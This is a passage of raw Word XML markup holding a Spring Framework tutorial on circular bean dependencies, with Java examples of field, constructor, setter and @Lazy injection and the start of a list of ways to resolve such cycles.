        <w:t xml:space="preserve"> occurs when two or more beans (or objects) depend on each other in such a way that they form a loop or cycle. This situation arises when Bean A depends on Bean B, and Bean B, in turn, depends on Bean A, directly or indirectly. In such a case, the dependency cannot be resolved because each bean is waiting for the other to be created, leading to a situation where neither can be instantiated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007E8C9D"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In the context of </w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, circular dependency happens when two or more beans are dependent on each other, and Spring's container cannot resolve the dependency because of the cycle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E51D1C" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9A65E2"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Consider two beans A and B that depend on each other:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4743629C"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Component</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2AD226"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public class A {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CCEB4D" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="586BA73D"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FBA6D4"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private B b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353BDA6C" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54373F0B"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 Other fields and methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667A72B8"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028FE200" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64DDD5B7"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Component</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5CC4C5"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public class B {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF58AA3" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18D47D96"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE2AC53"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    private A a;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F9B4E8" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A9E106F"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 Other fields and methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE9383B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1F1B54"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In the above example, A depends on B, and B depends on A. This creates a circular dependency because Spring cannot instantiate either A or B without first resolving the other, which results in a failure to create the beans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266854F0" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring's Circular Dependency Resolution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8F327D"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Spring has mechanisms to handle circular dependencies by using </w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>constructor injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>setter injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F909AD6" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2005"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Constructor Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If circular dependencies are created using constructor injection, Spring cannot resolve the circular dependency because it requires both beans to be fully constructed before they can be injected into each other. In such cases, Spring will throw a BeanCurrentlyInCreationException.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3990CAC6"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Component</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BFEF44"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public class A {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184AB54F" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="051A549F"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private final B b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2D15BA" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02A762BB"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A835175"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public A(B b) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD8F82E"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this.b = b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B5E52A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2537AD"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D5C342" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EB0B75B"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Component</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C770BFB"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public class B {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E136191" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0892D929"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private final A a;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A1B970" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B53B25D"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EE67DC"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public B(A a) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2913471A"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this.a = a;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639B84AA"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603D4DE4"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE1FF64"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Here, Spring will not be able to resolve the circular dependency with constructor injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0F77D2" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2005"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Setter Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: With setter injection, Spring can handle circular dependencies because Spring can create the beans first (without dependencies) and then inject the dependencies later via the setters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B747A9F"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Component</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E90FC9B"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public class A {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B378DCA" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D476329"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private B b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B40180" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12AA4AAB"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FF3A52"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public void setB(B b) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6D181B"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this.b = b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5742A61D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EB8C5D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11749FDC" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="422566C1"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Component</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE3DDEB"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public class B {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C5581C" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54D21EE9"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private A a;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF8AA56" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DAB68FB"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E72074"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public void setA(A a) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D4CF9D"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this.a = a;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232DB332"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B405411"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE5CDEA"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lastRenderedPageBreak/>
        <w:t>In this case, Spring first creates the instances of A and B, and then injects the required dependencies into them using the setter methods. This allows Spring to break the circular dependency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54197D9F" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2005"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Using @Lazy annotation</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In some cases, you can use the @Lazy annotation on one of the dependencies to make Spring instantiate it lazily, thereby avoiding the circular dependency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F52103" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>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Component</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070071A5" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>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public class A {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37147CAA" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27FF68AA" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>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private final B b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5F129C" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36599DC6" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27068A20" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>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public A(@Lazy B b) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EDB542" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>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this.b = b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4F7153" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BB80E0" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384BF7CE" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="556E58ED" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>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Component</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055653B1" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>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public class B {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD56DBD" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25DFCD98" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>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private final A a;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DF0335" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="278ACA91" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1289ED01" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>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public B(@Lazy A a) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5055E80C" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>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this.a = a;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB40667" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3766626E" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDAD499"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The @Lazy annotation tells Spring to instantiate the B bean only when it is needed, breaking the immediate circular reference.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1AEC16" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Resolving Circular Dependencies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E00798" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2006"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Avoid Constructor Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for circular dependencies. Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Setter Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Field Injection</w:t>
      </w:r>
